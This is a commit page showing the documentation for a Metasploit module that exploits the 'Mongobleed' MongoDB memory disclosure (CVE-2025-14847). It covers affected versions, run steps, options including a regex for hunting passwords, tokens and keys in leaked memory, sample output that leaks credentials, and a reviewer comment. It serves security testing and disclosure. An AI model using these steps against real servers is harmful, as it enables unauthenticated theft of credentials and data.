
Commit acc206b

Merge pull request #20833 from xaitax/CVE-2025-14847_Mongobleed
Add MongoDB memory disclosure module (CVE-2025-14847)
2 parents 259180e + 3b3d4f2 commit acc206b

File tree: 2 files changed, +810 -0 lines changed

Lines changed: 168 additions & 0 deletions
@@ -0,0 +1,168 @@
1+
## Vulnerable Application
2+
3+
This module exploits CVE-2025-14847, a memory disclosure vulnerability in MongoDB's zlib decompression handling, commonly referred to as "Mongobleed."
4+
5+
By sending crafted `OP_COMPRESSED` messages with inflated BSON document lengths, the server allocates a buffer based on the claimed uncompressed size but only fills it with the actual decompressed data. When MongoDB parses the BSON document, it reads beyond the decompressed buffer into uninitialized memory, returning leaked memory contents in error messages.
6+
7+
The vulnerability allows unauthenticated remote attackers to leak server memory which may contain sensitive information such as:
8+
- Database credentials
9+
- Session tokens
10+
- Encryption keys
11+
- Connection strings
12+
- Application data
13+
14+
### Vulnerable Versions
15+
16+
Per [MongoDB JIRA SERVER-115508](https://jira.mongodb.org/browse/SERVER-115508):
17+
18+
- MongoDB 3.6.x (all versions - EOL, no fix available)
19+
- MongoDB 4.0.x (all versions - EOL, no fix available)
20+
- MongoDB 4.2.x (all versions - EOL, no fix available)
21+
- MongoDB 4.4.0 through 4.4.29
22+
- MongoDB 5.0.0 through 5.0.31
23+
- MongoDB 6.0.0 through 6.0.26
24+
- MongoDB 7.0.0 through 7.0.27
25+
- MongoDB 8.0.0 through 8.0.16
26+
- MongoDB 8.2.0 through 8.2.2
27+
28+
### Fixed Versions
29+
30+
- MongoDB 4.4.30
31+
- MongoDB 5.0.32
32+
- MongoDB 6.0.27
33+
- MongoDB 7.0.28
34+
- MongoDB 8.0.17
35+
- MongoDB 8.2.3
36+
37+
## Verification Steps
38+
39+
1. Install a vulnerable MongoDB version (e.g., MongoDB 7.0.15)
40+
2. Start the MongoDB service
41+
3. Start msfconsole
42+
4. `use auxiliary/scanner/mongodb/cve_2025_14847_mongobleed`
43+
5. `set RHOSTS <target>`
44+
6. `run`
45+
7. Verify that memory contents are leaked and saved to loot
46+
47+
## Options
48+
49+
### MIN_OFFSET
50+
Minimum BSON document length offset to test. Default: `20`
51+
52+
### MAX_OFFSET
53+
Maximum BSON document length offset to test. Higher values scan more memory but take longer. Default: `8192`
54+
55+
### STEP_SIZE
56+
Offset increment between probes. Higher values are faster but less thorough. Default: `1`
57+
58+
### BUFFER_PADDING
59+
Padding added to the claimed uncompressed buffer size. Default: `500`
60+
61+
### LEAK_THRESHOLD
62+
Minimum bytes to report as an interesting leak in the output. Default: `10`
63+
64+
### QUICK_SCAN
65+
Enable quick scan mode which samples key offsets (power-of-2 boundaries, etc.) instead of scanning every offset. Much faster but may miss some leaks. Default: `false`
66+
67+
### REPEAT
68+
Number of scan passes to perform. Memory contents change over time, so multiple passes can capture more data. Default: `1`
69+
70+
## Advanced Options
71+
72+
### SHOW_ALL_LEAKS
73+
Show all leaked fragments regardless of size. Default: `false`
74+
75+
### SHOW_HEX
76+
Display hexdump of leaked data. Default: `false`
77+
78+
### SECRETS_PATTERN
79+
Regex pattern to detect sensitive data in leaked memory. Default: `password|secret|key|token|admin|AKIA|Bearer|mongodb://|mongo:|conn|auth`
80+
81+
### FORCE_EXPLOIT
82+
Attempt exploitation even if the version check indicates the target is patched. Default: `false`
83+
84+
### PROGRESS_INTERVAL
85+
Show progress every N offsets. Set to 0 to disable. Default: `500`
86+
87+
## Scenarios
88+
89+
### MongoDB 7.0.14 on Linux
90+
91+
```
92+
msf6 > use auxiliary/scanner/mongodb/cve_2025_14847_mongobleed
93+
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RHOSTS 192.168.1.100
94+
RHOSTS => 192.168.1.100
95+
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
96+
97+
[*] 192.168.1.100:27017 - MongoDB version: 7.0.14
98+
[+] 192.168.1.100:27017 - Version 7.0.14 is VULNERABLE to CVE-2025-14847
99+
[*] 192.168.1.100:27017 - Scanning 8173 offsets (20-8192, step=1)
100+
[+] 192.168.1.100:27017 - offset=20 len=82 : [conn38248] end connection 10.0.0.5:36845 (0 connections now open)
101+
[+] 192.168.1.100:27017 - offset=163 len=617 : driver: { name: "mongoc / ext-mongodb:PHP ", version: "1.24.3" }
102+
[+] 192.168.1.100:27017 - offset=501 len=40 : id bson type in element with field name
103+
[*] 192.168.1.100:27017 - Progress: 500/8173 (6.1%) - 7 leaks found - ETA: 49s
104+
[+] 192.168.1.100:27017 - offset=757 len=12 : password=abc
105+
[!] 192.168.1.100:27017 - Secret pattern detected at offset 757: 'password' in context: ...config: { password=abc123&user=admin...
106+
[*] 192.168.1.100:27017 - Progress: 1000/8173 (12.2%) - 11 leaks found - ETA: 42s
107+
...
108+
109+
[+] 192.168.1.100:27017 - Total leaked: 1703 bytes
110+
[+] 192.168.1.100:27017 - Unique fragments: 13
111+
[+] 192.168.1.100:27017 - Leaked data saved to: /root/.msf4/loot/20251230_mongobleed.bin
112+
113+
[!] 192.168.1.100:27017 - Potential secrets detected:
114+
[!] 192.168.1.100:27017 - - Pattern 'password' at offset 757 (pos 12): ...config: { password=abc123&user=admin...
115+
[*] 192.168.1.100:27017 - Scanned 1 of 1 hosts (100% complete)
116+
[*] Auxiliary module execution completed
117+
```
118+
119+
### Multi-Pass Scan for Maximum Data Collection
120+
121+
```
122+
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RHOSTS 192.168.1.100
123+
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set REPEAT 3
124+
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set MAX_OFFSET 16384
125+
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
126+
127+
[*] 192.168.1.100:27017 - MongoDB version: 7.0.14
128+
[+] 192.168.1.100:27017 - Version 7.0.14 is VULNERABLE to CVE-2025-14847
129+
[*] 192.168.1.100:27017 - Running 3 scan passes to maximize data collection...
130+
[*] 192.168.1.100:27017 - === Pass 1/3 ===
131+
[*] 192.168.1.100:27017 - Scanning 16365 offsets (20-16384, step=1)
132+
...
133+
[*] 192.168.1.100:27017 - Pass 1 complete: 23 new leaks (23 total unique)
134+
[*] 192.168.1.100:27017 - === Pass 2/3 ===
135+
...
136+
[*] 192.168.1.100:27017 - Pass 2 complete: 15 new leaks (38 total unique)
137+
[*] 192.168.1.100:27017 - === Pass 3/3 ===
138+
...
139+
[*] 192.168.1.100:27017 - Pass 3 complete: 8 new leaks (46 total unique)
140+
141+
[+] 192.168.1.100:27017 - Total leaked: 4521 bytes
142+
[+] 192.168.1.100:27017 - Unique fragments: 46
143+
[+] 192.168.1.100:27017 - Leaked data saved to: /root/.msf4/loot/20251230_mongobleed.bin
144+
```
145+
146+
### Quick Scan Mode
147+
148+
```
149+
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RHOSTS 192.168.1.100
150+
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set QUICK_SCAN true
151+
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
152+
153+
[*] 192.168.1.100:27017 - MongoDB version: 7.0.14
154+
[+] 192.168.1.100:27017 - Version 7.0.14 is VULNERABLE to CVE-2025-14847
155+
[*] 192.168.1.100:27017 - Scanning 97 offsets (20-8192, step=1, quick mode)
156+
[+] 192.168.1.100:27017 - offset=20 len=45 : connection string fragment...
157+
[+] 192.168.1.100:27017 - offset=128 len=23 : mongodb://admin:pass...
158+
159+
[+] 192.168.1.100:27017 - Total leaked: 234 bytes
160+
[+] 192.168.1.100:27017 - Unique fragments: 5
161+
[+] 192.168.1.100:27017 - Leaked data saved to: /root/.msf4/loot/20251230_mongobleed.bin
162+
```
163+
164+
## References
165+
166+
- https://www.wiz.io/blog/mongobleed-cve-2025-14847-exploited-in-the-wild-mongodb
167+
- https://jira.mongodb.org/browse/SERVER-115508
168+
- https://www.mongodb.com/docs/manual/reference/mongodb-wire-protocol/
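Review bot: the SECRETS_PATTERN default documented under Advanced Options (`password|secret|key|token|admin|AKIA|Bearer|mongodb://|mongo:|conn|auth`) does not agree with the first Scenario's sample output, where the fragment `[conn38248] end connection 10.0.0.5:36845 (0 connections now open)` at offset=20 contains `conn` twice yet triggers no "Secret pattern detected" line, and the closing "Potential secrets detected" summary lists only 'password' at offset 757. Either the documented default is not what the module actually applies (for example it is matched differently than the docs imply) or the sample output was trimmed; please reconcile the two, and consider dropping the broad substrings `key`, `conn` and `auth` from the default, since they will flag routine connection log lines and ordinary BSON field names and bury real hits. It would also help operators if the Options section stated plainly that a default pass sends one probe per offset (the Scenario shows 8173 messages for 20-8192 at step=1, and 16365 per pass at MAX_OFFSET 16384), each of which the server answers with an error response, so the traffic and server-side error volume of a full or multi-pass run can be judged before it is pointed at a production host.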
